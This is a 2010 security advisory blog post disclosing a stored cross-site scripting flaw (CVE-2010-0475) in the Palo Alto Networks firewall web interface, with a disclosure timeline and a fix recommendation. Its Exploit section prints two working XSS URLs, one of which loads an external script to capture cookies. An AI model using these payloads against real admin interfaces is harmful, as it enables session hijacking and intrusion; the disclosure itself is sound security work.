Vulnerability in Palo Alto Networks Firewall

PDFPrintE-mail

Written by Jeromie Jackson Published on Tuesday, 11 May 2010 15:57 Last updated on Tuesday, 11 May 2010 16:02

Palo Alto Networks XSS Vulnerability

I was playing around over the New Year, found a vulnerability in the Palo Alto Networks firewall, and worked with the vendor to get a patch in place.  Make sure you keep up with your maintenance upgrades!

 

Class: Cross-Site Scripting (XSS) Vulnerability

CVE: CVE-2010-0475

Remote: Yes

Local: Yes

Published: May 11, 2010 08:30AM

Timeline: Submission to MITRE: 1/18/2010

Vendor Contact: 2/18/2010

Vendor Response: 2/18/2010

Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)

Credit: Jeromie Jackson CISSP, CISM

COBIT & ITIL Certified

President- San Diego Open Web Application Security Project (OWASP)

Vice President- San Diego Information Audit & Control Association (ISACA)

SANS Mentor

LinkedIn: www.linkedin.com/in/securityassessment

Blog: www.JeromieJackson.com

Twitter: www.twitter.com/Security_Sifu

 

Validated Vulnerable:

Latest Version Per December 31, 2009

 

Discussion:

 

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.

 

Exploit:

Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT> &admin-role=%5Bobject+Object%5D&bSubmit=O

 

WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin<SCRIPT/XSS src="/http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O

 

Solution:

A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.

 

References:

OWASP Cross-Site Scripting (XSS) Attack Discussion

Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

 

 

Copyright © 2013 jeromiejackson.com. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.

JEZ Rego - Joomla theme by JoomlaEZ.com.